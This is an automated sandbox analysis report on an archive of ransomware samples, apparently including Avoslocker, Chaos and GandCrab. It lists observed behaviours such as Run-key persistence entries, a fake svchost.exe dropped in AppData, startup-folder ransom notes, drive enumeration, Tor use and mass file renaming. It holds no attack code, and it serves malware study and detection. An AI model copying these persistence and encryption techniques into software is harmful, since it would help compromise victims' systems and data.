Malware Analysis Report

2024-10-16 03:26

Sample ID 240921-zy79natgkl
Target RNSM00476.7z
SHA256 03a15123b54b8e5252af565dbc10e7c1d732ab8a92b905f6811e621680d7ff2c
Tags
avoslocker chaos gandcrab backdoor discovery execution persistence pyinstaller ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03a15123b54b8e5252af565dbc10e7c1d732ab8a92b905f6811e621680d7ff2c

Threat Level: Known bad

The file RNSM00476.7z was found to be: Known bad.

Malicious Activity Summary

avoslocker chaos gandcrab backdoor discovery execution persistence pyinstaller ransomware spyware stealer upx

Avoslocker Ransomware

Chaos Ransomware

Gandcrab

Chaos

GandCrab payload

Renames multiple (176) files with added filename extension

Renames multiple (74) files with added filename extension

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

UPX packed file

Drops startup file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates connected drives

Drops desktop.ini file(s)

Uses Tor communications

Sets desktop wallpaper using registry

Drops file in Program Files directory

Detects Pyinstaller

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Command and Scripting Interpreter: PowerShell

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Checks processor information in registry

Checks SCSI registry key(s)

Modifies registry key

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-21 21:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-21 21:08

Reported

2024-09-21 21:13

Platform

win10v2004-20240802-en

Max time kernel

275s

Max time network

277s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z

Signatures

Avoslocker Ransomware

ransomware avoslocker

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GandCrab payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gandcrab

ransomware backdoor gandcrab

Renames multiple (176) files with added filename extension

ransomware

Renames multiple (74) files with added filename extension

ransomware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\svchost.url C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\read_it.txt C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Cntrlphse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe N/A
N/A N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
N/A N/A C:\Users\Admin\AppData\ChickiMiki Design.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cntrlphse = "\"C:\\Users\\Admin\\AppData\\Roaming\\Cntrlphse.exe\"" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Explorer.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\omsyi2ijtq = "C:\\Users\\Admin\\DEsktop\\00476\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\plbddsybgrx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\bieiih.exe\"" C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Program Files\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe N/A

Uses Tor communications

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1550356177.png" C:\Windows\SysWOW64\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIsvSubsystemController.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLSLICER.DLL C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\ImagePlaceholderWhite.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index.exe.exe.exe C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.ServiceModel.Resources.dll C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-150.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe804.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngdatatype.md C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-pl.xrm-ms.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_scale-200.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_MedTile.scale-200.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1194130065-3471212556-1656947724-1000-MergedResources-0.pri C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\plugin2\vcruntime140.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-200.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-150.png C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4_Loud.m4a C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCommon.Thumbnails.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\166.png.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe N/A
